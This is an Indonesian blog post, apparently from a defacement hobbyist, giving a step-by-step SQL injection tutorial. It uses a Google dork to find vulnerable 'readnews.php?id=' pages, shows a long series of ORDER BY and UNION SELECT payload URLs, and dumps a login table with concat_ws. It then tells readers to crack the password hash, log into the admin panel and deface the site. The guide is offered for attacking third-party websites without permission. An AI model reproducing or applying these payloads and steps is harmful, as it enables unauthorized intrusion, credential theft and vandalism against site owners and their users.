TUTORIAL SQL MANUAL WITH DIOS ( DUMP IN ONE SHOOT )

Tutorial SQLI with DIOS ( Dump In One Shoot ) - sebelum itu saya mau kasih tau apa itu SQLI ?
SQL Injection adalah adalah teknik yang menyalahgunakan celah keamanan yang ada pada lapisan basis data sebuah aplikasi. Celah ini terjadi ketika input dari pengguna tidak disaring secara benar.



alo gaes.. kembali lagi bersama gue. kali ini gue mau kasih tutorial deface SQL Injection With DIOS
langsung aja ya gausah banyak cincong....

Bahan :
  • Dork : inurl:/readnews.php?id= *dork nya kembangin lagi ya biar pintar
  • DIOS Exploit disini

  • STEP :
    1. seperti biasa kalean dorking dulu di gugel. nah kalo gw udh nemuin web nya

    2. setelah sudah dorking cari web yang vuln, caranya ? kasih string (') di akhir URL.

    3. ciri ciri vuln ?
    You have an error in your SQL syntax, dll. kadang blank kadang ada gambar yang ilang.
    4. langsung tambahkan order by blablablabla....

    pada gambar diatas kan page nya belom error, urutin angkanya sampe nemu kode error/blank
    contoh :
    site.com/readnews.php?id=118'order+by+1-- - // no error
    site.com/readnews.php?id=118'order+by+2-- - // no error
    site.com/readnews.php?id=118'order+by+3-- - // no error
    site.com/readnews.php?id=118'order+by+4-- - // no error
    site.com/readnews.php?id=118'order+by+5-- - // no error
    site.com/readnews.php?id=118'order+by+6-- - // no error
    site.com/readnews.php?id=118'order+by+7-- - // no error
    site.com/readnews.php?id=118'order+by+8-- - // no error
    site.com/readnews.php?id=118'order+by+9-- - // no error
    site.com/readnews.php?id=118'order+by+10-- - // no error
    site.com/readnews.php?id=118'order+by+11-- - // no error
    site.com/readnews.php?id=118'order+by+12-- - // no error
    site.com/readnews.php?id=118'order+by+13-- - // no error
    site.com/readnews.php?id=118'order+by+14-- - // no error
    site.com/readnews.php?id=118'order+by+15-- - // no error
    site.com/readnews.php?id=118'order+by+16-- - // no error
    site.com/readnews.php?id=118'order+by+17-- - // no error
    site.com/readnews.php?id=118'order+by+18-- - // error

    5. nah di nomor 18 itu web nya berubah error lagi, berarti kita ambil dari nomor 17.

    6. setelah itu ganti order by menjadi UNION ALL SELECT.

    7. untuk memunculkan nomor togel nya masukkan tanda minus (-) di depan variabel ID.
    8. setelah keluar angka di web nya, masukkan DIOS di URL di bagian angka yg keluar tadi. kalo gw keluar angka : 3 sama 4 aja

    9. nah angka di gw keluar 3 jadi gw masukkan DIOS nya di angka 3.
    10. setelah dimasukkan, kita bisa tau apa saja yang ada di dalam table nya.

    11. ternyata dapat table yang bernama "login", cara tau isi yang ada di tabel login gimana ?
    12. tambahkan command "concat_ws" di angka yang keluar tadi. dan jangan lupa kasih "+from+asal table" di akhir
    13. berhubung yang keluar adalah id,user_name,password jadi gw masukkan "....,concat_ws(0x3a,id,user_name,password),...+from+login-- -"

    14. setelah dimasukkan command tersebut, nanti akan keluar datanya contoh kukuruyuk321@gmail.com:86c58054781d4e6884968f8472d92f9f

    15. setelah itu crack dulu passwordnya di hashkiller ato dimana gitu.
    16. setelah mengetahui passwordnya silahkan cari admin loginnya juga. maaf sebelumnya, saya tidak bisa share tools admin finder.
    17. setelah itu masuk ke admin page nya dan masukkan email dan pass tadi yang didapat.
    18. terserah kalian mau diapain website nya. ingat, kalau mau tebas backup dulu. susah jadi webmaster itu, kasihan.
    19. pict shell ?


    terimakasih atas perhatiannya, mohon maaf ya kalo ada salah tulis ato yang gajelas.
    ~admin

    No comments

    Powered by Blogger.